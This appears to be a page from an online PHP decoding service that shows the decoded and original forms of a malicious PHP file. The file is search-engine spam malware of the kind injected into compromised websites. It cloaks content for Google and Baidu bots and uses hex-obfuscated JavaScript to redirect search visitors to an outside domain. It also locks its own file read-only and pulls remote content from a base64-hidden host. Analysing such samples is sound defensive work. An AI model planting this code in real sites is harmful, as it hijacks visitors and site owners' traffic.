Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
->|<?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGEN..
Decoded Output download
->|<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$file =
echo $file;
}
?>
<script LANGUAGE="Javascript">
var JdsilflN_1=window["document"]["referrer"]
if(JdsilflN_1["indexOf"]("google")>0 || JdsilflN_1["indexOf"]("baidu")>0 || JdsilflN_1["indexOf"]("sogou")>0 ) location["href"]="http://um8868.com/";
</script><?php
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF'];
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
@chmod($name,0444);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ==");
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $c;
?>|<-
0
Did this file decode correctly?
Original Code
->|<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$file =
echo $file;
}
?>
<script LANGUAGE="Javascript">
var JdsilflN_1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if(JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75")>0 ) location["\x68\x72\x65\x66"]="\x68\x74\x74\x70\x3a\x2f\x2f\x75\x6d\x38\x38\x36\x38\x2e\x63\x6f\x6d\x2f";
</script><?php
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF'];
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
@chmod($name,0444);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ==");
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $c;
?>|<-
0
Function Calls
None |
Stats
MD5 | 8dbac3eae591a252263e1681f44e543b |
Eval Count | 0 |
Decode Time | 84 ms |